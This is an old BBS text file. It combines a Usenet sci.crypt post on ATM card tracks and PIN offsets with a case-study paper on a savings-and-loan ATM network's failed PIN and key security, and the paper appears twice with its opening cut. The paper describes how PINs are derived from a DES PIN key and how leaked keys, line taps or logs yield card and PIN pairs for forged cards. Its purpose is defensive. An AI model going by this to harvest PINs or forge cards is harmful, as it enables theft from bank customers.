into any order, scrambling the digits and slowing down an attacker.  (As
a side note, it could be noted that using the "standard" table, the  PIN
digits  are  weighted  to 0 through 5, each having a 1/8 chance of being
the digit, while 6 through 9 has only a 1/16 chance.)

When handling a foreign card, (i.e.  one that does  not  belong  to  the
institution that runs the ATM), the PIN must be passed on to the network
in encrypted form.  First, however, it must be passed from  the  ATM  to
the  ATM controller.  This is accomplished by encrypting the PIN entered
at  the  ATM  using  a  communication  key  (communication   key),   The
communication  key  is  entered  at  the  ATM much like the PIN key.  In
addition, it can be downloaded from the network.  The PIN  is  decrypted
at  the controller and then reencrypted with the network's communication
key.

                                 - 2 -

Security
PIN security
PIN key validation method

Maintaining  the  the  security  of  the  foreign  PIN  is  of  critical
importance.   Given  the  foreign PIN along with the ATM card's magnetic
image, the perpetrator has access to an account  from  any  ATM  on  the
network.    This  would  make  tracking  of  potential  attackers  quite
difficult, since the ATM and the institution they extract funds from can
be  completely  different from the institution where the information was
gleaned.

Given  that  the  encrypted  PIN  goes  through   normal   communication
processes,  it  could  be  logged  on  the normal I/O logs.  Since it is
subject to such logging, the PIN in any form should be denied  from  the
logging function.

3.2.  Security Violations
While  the EFT network has potential to run in a secured mode given some
of the precautions outlined above, the potential for abuse  of  security
is  quite easy.  In the case of this system, security was compromised in
a number of ways, each leading to the potential loss of funds, and to  a
loss of confidence in the EFT system itself.

3.2.1.  Violations of the PIN key method
The  two  custodian  system simply wasn't practical when ATMs were being
installed all over the state.  Two examples show this:   When  asked  by
the  developer  for the PIN key to be entered into a test ATM, there was
first a massive search for the key, and then it was read to him over the
phone.   The  PIN  key  was  written  on  a scrap of paper which was not
secured.  This is the PIN key that all the customer PINs are  based  on,
and which compromise should require the reissue of all PINs.)

The  importance of a system to enter the PIN key by appropriate officers
of the bank should not be overlooked.  In  practice  the  ATM  installer
might  be the one asked to enter the keys into the machine.  This indeed
was demonstrated in this case where the ATM installer not only had  the
keys  for  the  Savings and Loan, but also for other institutions in the
area.  This was kept in the high security area of the  notebook  in  the
installer's front pocket.

Having  a  Master key entered into the ATM by officers of the bank might
add an additional layer of security to the system.  The actual  PIN  key
would then be loaded in encrypted form from the network.  In the example
above, if the installer was aware of the terminal master key,  he  would
have to monitor the line to derive the actual PIN key.

The  use  of  a downline encrypted key was never implemented, due to the
potential complications and added cost of such a  system.   Even  if  it
was,  once violated, security can only be regained by a complete reissue
of customer PINs with the resulting confusion ensuing.

                                 - 3 -

Security
Security Violations
Network validated PIN Security violations

3.2.2.  Network validated PIN Security violations
Given  the  potential  for untraced transactions, the maintenance of the
foreign PINs security was extremely important.  In the PIN  key  example
above,  any  violation  would  directly  affect  the  institution of the
violators.  This would limit the scope of an investigation, and  enhance
the  chance of detection and apprehension.  The violation of foreign PIN
information has a much wider sphere of attack,  with  the  corresponding
lower chance of apprehension.

The  communication  key  itself  was  never  secured.  In this case, the
developer  handed  the  key  to  the  bank  officers,  to   ensure   the
communication  key  didn't get misplaced as the PIN key did (This way he
could recall it in case it got lost).  Given the communication key,  the
security  violation  potential  is  simple enough.  The programmer could
simply  tap  the  line  between  the  ATM  and  the  controller.    This
information  could  then generate a set of PIN and card image pairs.  He
would even have account balances.

Tapping the line would have been an effort, and worse yet he  could  get
caught.   However,  having  the  I/O  logs could serve the same purpose.
While originally designed to obscure PIN information in  the  I/O  logs,
the  feature was disabled due to problems caused by the regional network
during testing.  The I/O logs would be sent to the developer  any  time
there was a problem with the ATM controller or the network interface.

The  generation of PIN and card image pairs has a potential for even the
most secured system on the network  to  be  attacked  by  the  lapse  in
security  of  a weaker node.  Neither the communication key, nor the PIN
should ever be available in the clear.  This requires  special  hardware
at  the  controller  to  store  this  information.   In  this  case, the
institution had no desire to install a  secured  box  for  storing  key
information.   The  communication key was available in software, and the
PIN was in the clear during the process of decrypting from the  ATM  and
re-encrypting  with  the network key.  Any programmer on the system with
access to the controller could put in a log file to tap off the PINs  at
that point.

The largest failure of the system, though, was not a result of the items
described above.  The largest failure in the system was in the method of
encrypting  the  PIN  before  going  to the network.  This is due to the
failure of the network to have a secured key between sites.  The PIN was
to  be  encrypted  with  a  network  key.   The  network key was sent in
encrypted form from the network to the ATM controller.  However, the key
to  decrypt  the network key was sent almost in the clear as part of the
start-of-day sequence.

Any infiltrator monitoring the  line  would  be  able  to  get  all  key
information  by  monitoring the start-of-day sequence, doing the trivial
decryption of the communication key, and proceeding to gather card image
and PIN pairs.  The infiltrator could then generate cards and attack the
system at his leisure.

                                 - 4 -

Security
Security Violations
Network validated PIN Security violations

The network-ATM controller security failure is the most critical feature
since it was defined by a regional network supporting many institutions.
The network was supposedly  in  a  better  position  to  understand  the
security requirements.

4.  The Human Factors in Security  Violation
It is important the users of a system be appraised of the procedures for
securing the system.  They should understand the risks,  and  know  what
they  are  protecting.   The  bank officers in charge of the program had
little experience with ATM systems.  They were never fully indoctrinated
in  the  consequences of a PIN key or communication key compromise.  The
officers showed great surprise when the developer was able  to  generate
PINs  for  supplied  test cards.  Given the potential risk, nothing more
was done to try to change the PIN key,  even  though,  they  were  quite
aware  that  the  PIN  key was in the developer's possession.  They once
even called the developer for the PIN key when they weren't able to find
it.

The  developer  had a desire to maintain a smooth running system and cut
down on the development time of an  already  over-budget  project.   Too
much security, for example modifying I/O logs, could delay the isolation
or repair of a problem.

The regional network was actually a marketing company who  subcontracted
out  the  data processing tasks.  They failed to recognized the security
problem of sending key information with extremely weak encryption.   The
keys  were  all but sent in the clear.  There seemed to be a belief that
the use of encryption in and of itself caused a network to  be  secured.
The  use  of DES with an unsecured communication key gave the appearance
of a secured link.

The lack of audits of the system, both in design and implementation  was
the  final security defect which allowed the system to be compromised in
so many ways.  An example of the Savings and Loan's  internal  auditors
failure  to  understand  the problems or technology is when the auditors
insisted that no contract developers would be  allowed  physically  into
the  computer room.  The fact was, access to the computer room was never
required to perform any of the described violations.

5.  Security Corrections
As in any system where security was required, the time to  implement  it
is  at  the  beginning.  This requires the review of both implementation
and operational plans for the network.  Audits should  be  performed  to
verify  that  the  procedures  are  followed  as  described in the plan.
Financing, scheduling and man power for such audits must be allocated so
security issues can be addressed.

For this institution, the first step would have been to indoctrinate the

                                 - 5 -

Security Corrections

banking  officers  of  the risks in the ATM network, the vulnerabilites,
and the security measures required.

Custodians  of  all  keys should be well aware of their responsibilities
for those keys.  A fall back system of key recovery must be in place  in
case an officer is not available for key entry.

The  cost  of installing hardware encryption units at the host should be
included in the cost of putting in the  system.   The  host  unit  could
generate  down-line  keys for both the PIN key and the communication key
thus making it more difficult to derive  these  keys  without  collusion
from at least three people.

A  secured  communications key should be established between the Network
and the institution.  This would  allow  for  the  exchange  of  working
communication  keys.   This  key  should  be  changed  with a reasonable
frequency.

All these areas should be audited in both the system  specification  and
implementation  to  make sure they are not being abridged in the name of
expediency.

6.  Summary
In this view of a single  institution,  a  number  of  failures  in  the
security  system  were  shown.   There  was  shown a definite failure to
appreciate what was required in the way of security for  PINs  and  keys
used  to  derive  PIN  information.   An avoidance of up front costs for
security lead to potentially higher cost in the future.   The  key  area
was the lack of audits of the EFT system by both the institution and the
network, causing potential loss to all institutions on the network.

                                 - 6 -

Quick OVerview of ATM Security (Needs Editing)

(>View: automatic teller machines
From ames!amdahl!nsc!voder!wlbr!gins Mon Jul 13 12:41:23 PDT

Article 479 of sci.crypt:

Path: ames!amdahl!nsc!voder!wlbr!gins

>From: gins@wlbr.UUCP (Fred Ginsburg)

Newsgroups: sci.crypt

Subject: Re: ATM secret codes

Summary: ATM stuff

 LONG...

Message-ID: <1038@wlbr.UUCP>

Organization: Eaton IMS, Westlake Village, CA

Lines: 445

A

In article <548@l.cc.purdue.edu>, roz@l.cc.purdue.edu (Vu Qui Hao-Nhien) writes:

> In article <127@ddsw1.UUCP> karl@ddsw1.UUCP (Karl Denninger) writes:

> >In article <192@sugar.UUCP>, karl@sugar.UUCP (Karl Lehenbauer) writes:

> 

> The transactions done by ATM sometimes (not always) are kept by the

> machine until remove by human hands and fed to the bank's computer at

> its headquarters.  Hence not much communication between ATM and the

> outside world.

> -- 

on computer security.  Any questions, give a call (818-706-4146)

or send to {trwrb,ihnp4}!wlbr!gins 

***************  Track Layouts ************************

This is off the top of my head, but is 99% there.  Also I'll ignore

some obsolete stuff.

The physical layout of the cards are standard.  The LOGICAL makeup

varies from institution to institution.  There are some generally

followed layouts, but not mandatory.

There are actually up to three tracks on a card.

Track 1 was designed for airline use.  It contains your name and

usually your account number.  This is the track that is used when

the ATM greets you by name.  There are some glitches in how things

are ordered so occasionally you do get "Greetings Bill Smith Dr."

but such is life.  This track is also used with the new airline

auto check in (PSA, American, etc)

Track 3 is the "OFF-LINE" ATM track.  It contains [email protected]

information as your daily limit, limit left, last access, account

number, and expiration date.  (And usually anything I describe in track

2).  The ATM itself could have the ability to rewrite this track to

update information.

Track 2 is the main operational track for online use.  The first thing

on track to is the PRIMARY ACCOUNT NUMBER (PAN).  This is pretty

standard for all cards, though no guarantee.  Some additional info

might be on the card such as expiration date.  One interesting item

is the PIN offset.   When an ATM verifies a PIN locally, it usually

uses an encryption scheme involving the PAN and a secret KEY.

This gives you a "NATURAL PIN" (i.e. when they mail you your pin, this

is how it got generated.)  If you want to select your own PIN, they

would put the PIN OFFSET in the clear on the card.  Just do modulo 10

arithmetic on the Natural PIN plus the offset, and you have the

selected PIN.  YOUR PIN IS NEVER IN THE CLEAR ON YOUR CARD.  Knowing

the PIN OFFSET will not give you the PIN.  This will required the

SECRET KEY.

Hope that answers your question

************ Deposits at ATMs ************************

Deposits on ATM:

Various banks have various systems.  As an example, at CITIbank

a deposit was made to a specific account.  Your account was updated

with a MEMO update, i.e. it would show up on your balance.  However

it did not become AVAILABLE funds until it was verified by a teller.

On the envelope was Customer ID number, the envelope number and

the Entered dollar amount, the branch # and the Machine #.

There was also a selection for OTHER PAYMENTS.  This allowed you to

dump any deposit into the ATM.

What are you assured then when you deposit to an ATM ?

1) You have a banking RECORD (not a reciept at Citibank).  If you

   have this record, there is a VERY high percentage that you

   deposited something at that ATM.

2) Some banks have ways of crediting your deposit RIGHT NOW.

   This could be done by a balance in another account (i.e. a long

   term C.D. or a line of credit.)  That way they can get you if

   you lied.

**************  ATM Splitting a Card in half ***************

   I've worked with about 75% of the types of machines on the market

and NONE of them split a card in half upon swallow.  However, some

NETWORKS have a policy of  slicing a card to avoid security

problems.

Trusting an ATM.

Intresting you should bring this up, I'm just brusing up a paper

describing a REAL situation where your card and PIN are in the clear.

This involves a customer using a bank that is part of a network.

All the information was available to folks in DP, if they put in some

efforts to get it.

          Mis-Implementation of an ATM PIN security system

1.  Synopsis

In an EFT (Electronic Funds Transfer) network, a single node which  does

not  implement  the  proper  security  can  have  effects throughout the

network.  In this paper, the author describes an example of how security

features  were  ignored, never-implemented, and/or incorrectly designed.

The human factors involved in the final implementation are  explored  by

showing  several major vulnerabilites caused by a Savings and Loan and a

regional EFT network's lack of vigilance in installing  an  EFT  network

node.   While  using  an  EFT  system as an example, the concepts can be

extrapolated into the implementation of other secured systems.

2.  Background

A small Savings and Loan  was  setting  up  a  small  (10  to  16  ATMs)

proprietary  Automatic  Teller  Machine (ATM) network.  This network was

then intended to link up to a regional network.  The manufacturer of the

institution's  online  banking  processor  sent an on-site programmer to

develop the required interfaces.

An ATM network consists of three main  parts.   The  first  is  the  ATM

itself.   An ATM can have a range of intelligence.  In this case the ATM

was able to decode a  PIN  (Personal  Identification  Number)  using  an

institution  supplied  DES  (Data Encryption Standard) key.  It was then

required to send a request for funds to the host where it would receive

authorization.

The second portion of the network is the ATM controller.  The controller

monitors the transaction, and routes the message  to  the  authorization

processor.   The  controller  would  also generally monitor the physical

devices and statuses of the ATM.

The third portion of the network is the authorization system.   In  this

case  customers  of  the  local  institution  would have the transaction

authorized on the same processor.  Customers  from  foreign  (i.e.   one

that  does not belong to the institution that runs the ATM) institutions

would be authorized by the regional  network.   Authorization  could  be

from  a  run-up  file which maintains establishes a limit on withdrawals

for a  given  account  during  a  given  period.   A  better  method  is

authorization direct from the institution which issued the card.

3.  Security

The system has a two component key system to allow access to the network

by the customer.  The first  is  the  physical  ATM  card  which  has  a

magnetic stripe.  The magnetic stripe contains account information.  The

second component is the Personal Identification Number (PIN).   The  PIN

is hand entered by the customer into the ATM at transaction time.  Given

these  two  parts,  the  network  will  assume  that  the  user  is  the

appropriate customer and allow the transaction to proceed.

The Magnetic stripe is in the clear and may be assume to be reproducible

using various methods, thus the PIN is crucial security.

Security

PIN security

3.1.  PIN security

3.1.1.  PIN key validation method

PINs can be linked up to a particular card in a  number  of  ways.   One

method  puts  the  PIN  into  a central data base in a one-way encrypted

format.  When a PIN is presented, it  would  be  encrypted  against  the

format  in  the  data base.  This method requires a method of encrypting

the PIN given at the ATM, until it can be verified at the central  site.

Problems  can  also  occur if the institution wants to move the PIN data

base to another processor, especially from a different computer vendor.

Another  method  is  to take information on the card, combine it with an

institution PIN encryption key (PIN key) and use that  to  generate  the

PIN.   The institution in question used the PIN key method.  This allows

the customer to be verified at the ATM itself and no transmission of the

PIN  is  required.   The  risk  of  the  system  is  the PIN key must be

maintained under the tightest of security.

The PIN key is used to generate the natural PIN.   This  is  derived  by

taking  the  account number and using DES upon it with the PIN key.  The

resulting number then is decimialized by doing a lookup on  a  16  digit

decimalization  table  to  convert  the  resulting hexadecimal digits to

decimal digits.  An ATM loaded with the appropriate  PIN  key  can  then

validate  a customer locally with no need to send PIN information to the

network, thereby reducing the risk of compromise.

The PIN key requires the utmost security.  Once the PIN  key  is  known,

any  customer's  ATM card, with corresponding PIN can be created given a

customer account number.  The ATM allows for the PIN to  be  entered  at

the  ATM  in  two parts, thus allowing each of two bank officers to know

only one half of the key.  If desired, a terminal  master  key  can  be

loaded and then the encrypted PIN key loaded from the network.

The  decimalization table usually consists of 0 to 9 and 0 to 5, ("0" to

"F" in hexadecimal where "F" = 15).  The decimalization table can be put

into any order, scrambling the digits and slowing down an attacker.  (As

a side note, it could be noted that using the "standard" table, the  PIN

digits  are  weighted  to 0 through 5, each having a 1/8 chance of being

the digit, while 6 through 9 has only a 1/16 chance.)

When handling a foreign card, (i.e.  one that does  not  belong  to  the

institution that runs the ATM), the PIN must be passed on to the network

in encrypted form.  First, however, it must be passed from  the  ATM  to

the  ATM controller.  This is accomplished by encrypting the PIN entered

at  the  ATM  using  a  communication  key  (communication   key),   The

communication  key  is  entered  at  the  ATM much like the PIN key.  In

addition, it can be downloaded from the network.  The PIN  is  decrypted

at  the controller and then reencrypted with the network's communication

key.

                                 - 2 -

Security

PIN security

PIN key validation method

Maintaining  the  the  security  of  the  foreign  PIN  is  of  critical

importance.   Given  the  foreign PIN along with the ATM card's magnetic

image, the perpetrator has access to an account  from  any  ATM  on  the

network.    This  would  make  tracking  of  potential  attackers  quite

difficult, since the ATM and the institution they extract funds from can

be  completely  different from the institution where the information was

gleaned.

Given  that  the  encrypted  PIN  goes  through   normal   communication

processes,  it  could  be  logged  on  the normal I/O logs.  Since it is

subject to such logging, the PIN in any form should be denied  from  the

logging function.

3.2.  Security Violations

While  the EFT network has potential to run in a secured mode given some

of the precautions outlined above, the potential for abuse  of  security

is  quite easy.  In the case of this system, security was compromised in

a number of ways, each leading to the potential loss of funds, and to  a

loss of confidence in the EFT system itself.

3.2.1.  Violations of the PIN key method

The  two  custodian  system simply wasn't practical when ATMs were being

installed all over the state.  Two examples show this:   When  asked  by

the  developer  for the PIN key to be entered into a test ATM, there was

first a massive search for the key, and then it was read to him over the

phone.   The  PIN  key  was  written  on  a scrap of paper which was not

secured.  This is the PIN key that all the customer PINs are  based  on,

and which compromise should require the reissue of all PINs.)

The  importance of a system to enter the PIN key by appropriate officers

of the bank should not be overlooked.  In  practice  the  ATM  installer

might  be the one asked to enter the keys into the machine.  This indeed

was demonstrated in this case where the ATM installer not only had  the

keys  for  the  Savings and Loan, but also for other institutions in the

area.  This was kept in the high security area of the  notebook  in  the

installer's front pocket.

Having  a  Master key entered into the ATM by officers of the bank might

add an additional layer of security to the system.  The actual  PIN  key

would then be loaded in encrypted form from the network.  In the example

above, if the installer was aware of the terminal master key,  he  would

have to monitor the line to derive the actual PIN key.

The  use  of  a downline encrypted key was never implemented, due to the

potential complications and added cost of such a  system.   Even  if  it

was,  once violated, security can only be regained by a complete reissue

of customer PINs with the resulting confusion ensuing.

                                 - 3 -

Security

Security Violations

Network validated PIN Security violations

3.2.2.  Network validated PIN Security violations

Given  the  potential  for untraced transactions, the maintenance of the

foreign PINs security was extremely important.  In the PIN  key  example

above,  any  violation  would  directly  affect  the  institution of the

violators.  This would limit the scope of an investigation, and  enhance

the  chance of detection and apprehension.  The violation of foreign PIN

information has a much wider sphere of attack,  with  the  corresponding

lower chance of apprehension.

The  communication  key  itself  was  never  secured.  In this case, the

developer  handed  the  key  to  the  bank  officers,  to   ensure   the

communication  key  didn't get misplaced as the PIN key did (This way he

could recall it in case it got lost).  Given the communication key,  the

security  violation  potential  is  simple enough.  The programmer could

simply  tap  the  line  between  the  ATM  and  the  controller.    This

information  could  then generate a set of PIN and card image pairs.  He

would even have account balances.

Tapping the line would have been an effort, and worse yet he  could  get

caught.   However,  having  the  I/O  logs could serve the same purpose.

While originally designed to obscure PIN information in  the  I/O  logs,

the  feature was disabled due to problems caused by the regional network

during testing.  The I/O logs would be sent to the developer  any  time

there was a problem with the ATM controller or the network interface.

The  generation of PIN and card image pairs has a potential for even the

most secured system on the network  to  be  attacked  by  the  lapse  in

security  of  a weaker node.  Neither the communication key, nor the PIN

should ever be available in the clear.  This requires  special  hardware

at  the  controller  to  store  this  information.   In  this  case, the

institution had no desire to install a  secured  box  for  storing  key

information.   The  communication key was available in software, and the

PIN was in the clear during the process of decrypting from the  ATM  and

re-encrypting  with  the network key.  Any programmer on the system with

access to the controller could put in a log file to tap off the PINs  at

that point.

The largest failure of the system, though, was not a result of the items

described above.  The largest failure in the system was in the method of

encrypting  the  PIN  before  going  to the network.  This is due to the

failure of the network to have a secured key between sites.  The PIN was

to  be  encrypted  with  a  network  key.   The  network key was sent in

encrypted form from the network to the ATM controller.  However, the key

to  decrypt  the network key was sent almost in the clear as part of the

start-of-day sequence.

Any infiltrator monitoring the  line  would  be  able  to  get  all  key

information  by  monitoring the start-of-day sequence, doing the trivial

decryption of the communication key, and proceeding to gather card image

and PIN pairs.  The infiltrator could then generate cards and attack the

system at his leisure.

                                 - 4 -

Security

Security Violations

Network validated PIN Security violations

The network-ATM controller security failure is the most critical feature

since it was defined by a regional network supporting many institutions.

The network was supposedly  in  a  better  position  to  understand  the

security requirements.

4.  The Human Factors in Security  Violation

It is important the users of a system be appraised of the procedures for

securing the system.  They should understand the risks,  and  know  what

they  are  protecting.   The  bank officers in charge of the program had

little experience with ATM systems.  They were never fully indoctrinated

in  the  consequences of a PIN key or communication key compromise.  The

officers showed great surprise when the developer was able  to  generate

PINs  for  supplied  test cards.  Given the potential risk, nothing more

was done to try to change the PIN key,  even  though,  they  were  quite

aware  that  the  PIN  key was in the developer's possession.  They once

even called the developer for the PIN key when they weren't able to find

it.

The  developer  had a desire to maintain a smooth running system and cut

down on the development time of an  already  over-budget  project.   Too

much security, for example modifying I/O logs, could delay the isolation

or repair of a problem.

The regional network was actually a marketing company who  subcontracted

out  the  data processing tasks.  They failed to recognized the security

problem of sending key information with extremely weak encryption.   The

keys  were  all but sent in the clear.  There seemed to be a belief that

the use of encryption in and of itself caused a network to  be  secured.

The  use  of DES with an unsecured communication key gave the appearance

of a secured link.

The lack of audits of the system, both in design and implementation  was

the  final security defect which allowed the system to be compromised in

so many ways.  An example of the Savings and Loan's  internal  auditors

failure  to  understand  the problems or technology is when the auditors

insisted that no contract developers would be  allowed  physically  into

the  computer room.  The fact was, access to the computer room was never

required to perform any of the described violations.

5.  Security Corrections

As in any system where security was required, the time to  implement  it

is  at  the  beginning.  This requires the review of both implementation

and operational plans for the network.  Audits should  be  performed  to

verify  that  the  procedures  are  followed  as  described in the plan.

Financing, scheduling and man power for such audits must be allocated so

security issues can be addressed.

For this institution, the first step would have been to indoctrinate the

                                 - 5 -

Security Corrections

banking  officers  of  the risks in the ATM network, the vulnerabilites,

and the security measures required.

Custodians  of  all  keys should be well aware of their responsibilities

for those keys.  A fall back system of key recovery must be in place  in

case an officer is not available for key entry.

The  cost  of installing hardware encryption units at the host should be

included in the cost of putting in the  system.   The  host  unit  could

generate  down-line  keys for both the PIN key and the communication key

thus making it more difficult to derive  these  keys  without  collusion

from at least three people.

A  secured  communications key should be established between the Network

and the institution.  This would  allow  for  the  exchange  of  working

communication  keys.   This  key  should  be  changed  with a reasonable

frequency.

All these areas should be audited in both the system  specification  and

implementation  to  make sure they are not being abridged in the name of

expediency.

6.  Summary

In this view of a single  institution,  a  number  of  failures  in  the

security  system  were  shown.   There  was  shown a definite failure to

appreciate what was required in the way of security for  PINs  and  keys

used  to  derive  PIN  information.   An avoidance of up front costs for

security lead to potentially higher cost in the future.   The  key  area

was the lack of audits of the EFT system by both the institution and the

network, causing potential loss to all institutions on the network.

Downloaded From P-80 Systems 304-744-2253 - Since 1980